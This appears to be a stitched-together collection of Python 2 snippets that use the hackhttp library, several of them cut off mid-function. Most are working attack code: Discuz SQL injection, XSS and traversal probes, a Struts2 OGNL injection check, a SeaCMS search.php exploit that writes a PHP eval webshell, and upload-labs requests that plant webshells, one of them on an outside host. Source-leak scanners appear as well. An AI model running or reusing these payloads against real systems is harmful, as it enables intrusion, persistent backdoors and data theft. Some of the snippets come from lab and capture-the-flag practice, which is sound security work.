def audit(args): payload0 = "member.php?mod=logging&action=login&referer=javascript://www.discuz.net/testvul" payload1 = "connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/testvul" verify_url = args + payload0 code, head, res, errcode, _ = hackhttp().http(verify_url) if code == 200 and "javascript://www.discuz.net/testvul" in res: security_info(verify_url) return verify_url = args + payload1 code, head, res, errcode, _ = hackhttp().http(verify_url) if code == 200 and "javascript://www.discuz.net/testvul" in res: security_info(verify_url)
def upload(lists): hh = hackhttp.hackhttp() raw = """ POST /upload-labs/Pass-17/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/upload-labs/Pass-17/index.php Cookie: pass=17 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------6696274297634 Content-Length: 341 -----------------------------6696274297634 Content-Disposition: form-data; name="upload_file"; filename="17.php" Content-Type: application/octet-stream <?php assert($_POST["LandGrey"])?> -----------------------------6696274297634 Content-Disposition: form-data; name="submit" 上传 -----------------------------6696274297634-- """ code, head, html, redirect, log = hh.http('http://127.0.0.1/upload-labs/Pass-17/index.php', raw=raw) print(str(code) + "\r")
def upload(lists): hh = hackhttp.hackhttp() raw = """POST /Pass-18/index.php HTTP/1.1 Host: 192.168.99.50 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Referer: http://192.168.99.50/Pass-18/index.php DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------220322109030489 Content-Length: 334 -----------------------------220322109030489 Content-Disposition: form-data; name="upload_file"; filename="18.php.7z" Content-Type: application/octet-stream <?php phpinfo();?> -----------------------------220322109030489 Content-Disposition: form-data; name="submit" ä¸ä¼ -----------------------------220322109030489-- """ code, head, html, redirect, log = hh.http( 'http://192.168.99.50/Pass-18/index.php', raw=raw) print(str(code) + "\r")
def upupup(target, r_url, raw_data): #hackhttp上传 try: print "进入upupup()" r_url = r_url.replace('TARGET_IP', target) req = hackhttp.hackhttp() code, head, body, redirect, log = req.http(url=r_url, raw=raw_data) # print log['response'] if code == 404: print target, code, r_url, ":上传页面被删除,常规循环上传等待目标重置环境" usual_get(target) time.sleep(5) print "跳出upupup():404" return '' rex = re.compile(r'http://.+\.php') a = re.findall(rex, log['response']) # print "获取到上传路径:",a[0] # print log['response'] # if len(a)<2: # target,res=usual_get(target) print "跳出upupup():find_all", a[0] return a[0] #要返回webshell地址正则 http://.+\.php re.search except Exception as e: print target, "err from upupup", e print "跳出upupup():err", target, req.throw_exception return ''
def check_vuln(self, arg): curl = hackhttp.hackhttp() uri = urlparse.urlparse(arg).path randint1 = random.randint(1000, 10000) raw = """POST {uri} HTTP/1.1 Accept-Encoding: identity Content-Length: 171 Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36; Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 --1c88e9afa73c438d93b5043a7096b207 Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b" Content-Type: text/plain --1c88e9afa73c438d93b5043a7096b207-- """.format(uri=uri, randint1=str(randint1)) code, head, html, redir, log = curl.http(arg, raw=raw) # print head if code != 0 and "X-Test-%s" % str(randint1) in head: return True else: return False
def upload(value): h = hackhttp.hackhttp() data = '''POST /Pass-18/index.php?action=show_code HTTP/1.1 Host: afei123.com:8020 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------36444535571657258037124113983 Content-Length: 383 Origin: http://afei123.com:8020 Connection: close Referer: http://afei123.com:8020/Pass-18/index.php?action=show_code Upgrade-Insecure-Requests: 1 -----------------------------36444535571657258037124113983 Content-Disposition: form-data; name="upload_file"; filename="x.php" Content-Type: application/octet-stream <?php fputs(fopen('shell.php', 'w'), '<?php @eval($_POST['afei']);?>');?> -----------------------------36444535571657258037124113983 Content-Disposition: form-data; name="submit" submit -----------------------------36444535571657258037124113983-- ''' code, head, html, redirect_url, log = h.http("http://afei123.com:8020/Pass-18/index.php", raw=data) print code
def vlun(url, datefile): webinfokey = "</web-app>" gitkey = 'repositoryformatversion' svnkey = 'svn://' headers = { 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" } try: hh = hackhttp.hackhttp() code, _, body, _, _ = hh.http(url=url, headers=headers, location=False, throw_exception=False, method='GET') if code == 200: if webinfokey in body or gitkey in body or svnkey in body: logging.warning("[*] {}".format(url)) with open(datefile, 'a') as f: try: f.write(str(url) + '\n') except: pass else: logging.warning("[ ] {}".format(url)) else: logging.warning("[-] %s" % url) except: pass
def GetFile(domain,Filename,sha1): hh = hackhttp.hackhttp() Url = domain+"/.svn/pristine/"+str(sha1)[0:2]+"/"+str(sha1)+".svn-base" a,b,c,d,e = hh.http(Url) fp = open(Filename,"w") fp.write(c) fp.close()
def __init__(self, url): self.url = url self.sess = requests.session() self.hh = hackhttp.hackhttp(hackhttp.httpconpool()) self.tp = thread_pool.ThreadPool(500) self.headers = headers_dict = { 'X-Forwarder-For': '192.168.1.1', }
def audit(arg): payload = 'batch.common.php?action=modelquote&cid=1&name=spacecomments,(SELECT%203284%20FROM(SELECT%20COUNT(*),CONCAT(CH' \ 'AR(58,105,99,104,58),(MID((IFNULL(CAST(md5(160341893519135)%20AS%20CHAR),CHAR(32))),1,50)),' \ 'CHAR(58,107,111,117,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)' target = arg + payload code, head, res, errcode, finalurl = hackhttp().http('%s' % target) if code == 200: if "3c6b20b60b3f57247420047ab16d3d71" in res: security_hole(target)
def __init__(self, httpTarget, payloadsQueue, raw, orgData, result, payloadLenght): threading.Thread.__init__(self) self.hh = hackhttp.hackhttp(hackhttp.httpconpool(500)) self.httpTarget = httpTarget self._queue = payloadsQueue self.raw = raw self.orgData = orgData self.results = result self.length = payloadLenght
def createM(): hh = hackhttp.hackhttp() code, head, html, redirect, log = hh.http( 'http://api.daocloud.io/v1/single_runtime/nodes', raw=raw) print html if "sandbox_password" in html: r_j = json.loads(html) ip = r_j['node']['sandbox_ip_address'] username = '******' passwd = r_j['node']['sandbox_password']
def tomcat(raw): url = 'http://www.cnvd.org.cn/flaw/list.htm?flag=true' hh = hackhttp.hackhttp() code, head, html, redirect, log = hh.http(url=url, raw=raw) soup = BS(html, 'lxml') tomcat_html = soup.tbody #print tomcat_html tomcat_cnvds = BS(str(tomcat_html), 'lxml') cnvds = tomcat_cnvds.find_all( name='a', attrs={'href': re.compile('/flaw/show/CNVD-.*?')}) #print cnvds for cnvd in cnvds: print cnvd['title']
def apache(self,raw): hh = hackhttp.hackhttp() code, head, html, redirect, log = hh.http('http://www.cnvd.org.cn/flaw/list.htm?flag=true', raw=raw) # print html soup = BS(html,'lxml') apache_html = soup.tbody # print apache_html apache_cnvds = BS(str(apache_html),'lxml') cnvds = apache_cnvds.find_all('a',attrs={'href':re.compile('CNVD')}) # print cnvds for cnvd in cnvds: print cnvd['title']
def audit(arg): payloads = [ 'admincp.php?infloat=yes&handlekey=123);alert(/xss/);//', 'ajax.php?infloat=yes&handlekey=123);alert(/xss/);//', 'announcement.php?infloat=yes&handlekey=123);alert(/xss/);//', 'attachment.php?infloat=yes&handlekey=123);alert(/xss/);//', 'member.php?infloat=yes&handlekey=123);alert(/xss/);//', 'post.php?action=reply&fid=17&tid=1591&extra=&replysubmit=yes&infloat=yes&handlekey=123);alert(/xss/);//' ] for payload in payloads: url = arg + payload code, head, res, _, _ = hackhttp().http(url) if code == 200 and 'alert(/xss/);//' in res: security_warning(url)
def get_header(url): try: print "Get http header:", url if not url.startswith("http"): url = "http://" + url hh = hackhttp.hackhttp() code, head, body, redirect, log = hh.http(url, headers=requests_headers()) print "Get header ok:", url if log: return log['response'].decode('utf-8', 'ignore').encode('utf-8') else: return False except: return False
def audit(arg): wordlist = [ 'api/addons/zendcheck.php', 'api/addons/zendcheck52.php', 'api/addons/zendcheck53.php', 'source/plugin/mobile/api/1/index.php', 'source/plugin/mobile/extends/module/dz_digest.php', 'source/plugin/mobile/extends/module/dz_newpic.php', 'source/plugin/mobile/extends/module/dz_newreply.php', 'source/plugin/mobile/extends/module/dz_newthread.php', ] for payload in wordlist: verify_url = arg + payload pathinfo = re.compile(r' in <b>(.*)</b> on line') code, body, res, errcode, _ = hackhttp().http(verify_url) match = pathinfo.findall(body) if code == 200 and match: security_info('Discuz X3.0 full Path Disclosure Vulnerability', verify_url)
def run(self): while True: if self._queue.empty(): break try: urls = self._queue.get() http = hackhttp.hackhttp() code, head, html, redirect_url, log = http.http(urls) if (code == 200): print u" Biu biu biu ▄︻┻┳══━一 " + "\033[1;31;40m" + urls #print urls # with open('exists_url.txt','w') as f: # f.write(urls+"\n") with open('result.html', 'a+') as f: f.write('<a href="' + urls + '" target="_blank">' + urls + '</a>') f.write('\r\n</br>') except: print "error"
def exploit(url): Url = url + "/search.php" print "[*]Exploit Url:" + url raw = '''POST /search.php HTTP/1.1 Host: %s Proxy-Connection: keep-alive Content-Length: 22 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: %s Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.8 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>'); ''' % (url, Url) hh = hackhttp.hackhttp() try: a, b, c, d, e = hh.http(url=Url, raw=raw) except: print "[-]SomeError Happened!"
def exploit(url): Url = url + "/search.php" print "[*]Exploit Url:"+url raw = '''POST /search.php HTTP/1.1 Host: %s Proxy-Connection: keep-alive Content-Length: 22 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: %s Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.8 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=fwrite(&9[]=fopen('Mr.php','w')&9[]=,'<?php eval($_POST["Mr"]);?>'); '''%(url,Url) hh = hackhttp.hackhttp() try: a,b,c,d,e = hh.http(url = Url ,raw = raw) except: print "[-]SomeError Happened!"
from common import * else: from common2 import * import common2 as common import util import DNS import threadpool from functools import partial from fingerprint import FingerPrint from dnslog import DNSLog import hackhttp import hackhttp as hh hackhttp = hh.hackhttp() fingerprint = FingerPrint() _G = { 'scanport': False, 'subdomain': False, 'target': 'www.abc.com', 'disallow_ip': ['127.0.0.1'], 'kv': {}, 'udomain': "test", # 'user_dict':'http://192.168.0.158/1.txt' # 'pass_dict':'http://192.168.0.158/1.txt' "custom_dict": {} }
def __init__(self, args): self.args = args self.payloads = [] self.payloadsQueue = Queue() self.hh = hackhttp.hackhttp() self.result = []
#!/usr/bin/env python # coding:utf-8 from thread_pool import ThreadPool import hackhttp import re import os hh = hackhttp.hackhttp(hackhttp.httpconpool(500)) tp = ThreadPool(500) package = "wooyun" if not os.path.exists(package): os.mkdir(package) def vlun(wid): print "[+]%s" % wid if os.path.isfile(wid + ".html"): return _, _, html, _, _ = hh.http( url="http://wooyun.org/bugs/%s" % wid, cookcookie=False) open(package + "/" + wid + '.html', 'wb').write(html) def catalog(page): _, _, html, _, _ = hh.http( url="http://wooyun.org/bugs/new_public/page/%d" % page, cookcookie=False) for wid in re.findall(r'href="/bugs/(wooyun-\d+-\d+)">', html): tp.add_task(vlun, wid) if page > 0:
# -*- coding:utf8 -*- from hackhttp import hackhttp import base64 url = 'http://120.24.86.145:8002/web6/' h = hackhttp(cookie_str='PHPSESSID=nsgvo07u0req808u0orteq1hvdsnttgf;') code, head, html, redirect_url, log = h.http(url) flag = base64.b64decode(base64.b64decode(head['flag']).split(': ')[1]) print (flag) code, head, html, redirect_url, log = h.http(url,post='margin='+flag) print (html)
def audit(args): payload = "/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//" verify_url = args + payload code, head, content, errcode, finalurl = hackhttp().http(verify_url) if code == 200 and "if($('return_123);alert(/testvul/);//'" in content: security_info(verify_url)
def audit(arg): payload = 'plugin.php?id=milu_seotool:sitemap&myac=../../robots.txt%00' url = arg + payload code, head, res, errcode, _ = hackhttp().http(url) if code == 200 and "User-agent" in res: security_hole(url)
def audit(args): payload = "plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=(updatexml(1,concat(0x27,MD5(1)),1))--" verify_url = args + payload code, head, res, errcode, _ = hackhttp().http(verify_url) if code == 200 and "c4ca4238a0b923820dcc509a6f75849" in res: security_hole(verify_url)
#!/usr/bin/env python # -*- coding: utf-8 -*- Bugscan = 'https://www.bugscan.net/' from common import * import util from functools import partial from fingerprint import FingerPrint import hackhttp hackhttp = hackhttp.hackhttp() fingerprint = FingerPrint() _G = { 'scanport': False, 'subdomain': False, 'target': 'www.abc.com', 'disallow_ip': ['127.0.0.1'], 'kv': {}, #'user_dict':'http://192.168.0.158/1.txt' #'pass_dict':'http://192.168.0.158/1.txt' } util._G = _G def debug(fmt, *args): print(fmt % args) LEVEL_NOTE = 0 LEVEL_INFO = 1 LEVEL_WARNING = 2
#!/usr/bin/env python # coding:utf-8 import hackhttp hh = hackhttp.hackhttp() raw = '''POST /post HTTP/1.1 Host: httpbin.org User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 19 key1=val1&key2=val2''' code, head, html, redirect, log = hh.http('http://httpbin.org/post', raw=raw) print log['request']
# /usr/bin/python # -*-coding:utf-8-*- import re try: from hackhttp import hackhttp except: os.system("pip install hackhttp") try: import argparse except: os.system("pip install argparse") test = hackhttp() def login(): raw = """POST / HTTP/1.1 Host: admin.dnslog.link User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://admin.dnslog.link/ Cookie: csrftoken=A9y9Ecab1GlfQJKaJscqokzPUyD5hWII Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------936596724326007758981605209 Content-Length: 469 -----------------------------936596724326007758981605209 Content-Disposition: form-data; name="username"
#!/usr/bin/env python # -*- coding: utf-8 -*- Bugscan='https://www.bugscan.net/' from common import * import util from functools import partial from fingerprint import FingerPrint import hackhttp import miniCurl import requests as req from pocscanui.settings import SAVE_RESULT_API curl = miniCurl.Curl() hackhttp=hackhttp.hackhttp() fingerprint=FingerPrint() _G = { 'scanport':False, 'subdomain': False, 'target': 'www.abc.com', 'disallow_ip':['127.0.0.1'], 'kv' : {}, #'user_dict':'http://192.168.0.158/1.txt' #'pass_dict':'http://192.168.0.158/1.txt' } util._G = _G def debug(fmt, *args): print(fmt % args)
import hackhttp hh = hackhttp.hackhttp() with open('dga.txt') as f: dgas = f.readlines(100) for dga in dgas[18:]: url = dga.split('\t')[1] url = 'http://' + url print url try: hh.http(url) except: pass
# -*- coding:utf-8 -*- # author:flystart # home:www.flystart.org import sys import traceback import hackhttp import urlparse import time import chardet # from requests.adapters import HTTPAdapter from lib.core.datatype import AttribDict from lib.core.data import conf, logger from lib.core.common import q_str_to_dict, dict_to_q_str, format_hex, format_unicode, url_encode, get_file_contents # requests.adapters.DEFAULT_RETRIES = 5 fly_req = hackhttp.hackhttp() # fly_req.mount('http://', HTTPAdapter(max_retries=3)) # fly_req.mount('https://', HTTPAdapter(max_retries=3)) class Request: def __init__(self, headers, proxies={}, timeout=3, method='get'): if proxies: host, port = proxies.values()[0].split(":") proxies = (host, int(port)) if conf.raw: self.raw_request = get_file_contents(conf.raw) self.headers = headers self.proxies = proxies self.timeout = timeout self.method = method
def spider(self, data): hh = hackhttp.hackhttp() code, head, html, redirect, log = hh(url='https://www.seebug.org', raw=raw) print code
#!/usr/bin/env python # coding:utf-8 from thread_pool import ThreadPool import hackhttp import re import os hh = hackhttp.hackhttp(hackhttp.httpconpool(500)) tp = ThreadPool(500) package = "wooyun" if not os.path.exists(package): os.mkdir(package) def vlun(wid): print "[+]%s" % wid if os.path.isfile(wid + ".html"): return _, _, html, _, _ = hh.http(url="http://wooyun.org/bugs/%s" % wid, cookcookie=False) open(package + "/" + wid + '.html', 'wb').write(html) def catalog(page): _, _, html, _, _ = hh.http( url="http://wooyun.org/bugs/new_public/page/%d" % page, cookcookie=False) for wid in re.findall(r'href="/bugs/(wooyun-\d+-\d+)">', html): tp.add_task(vlun, wid) if page > 0: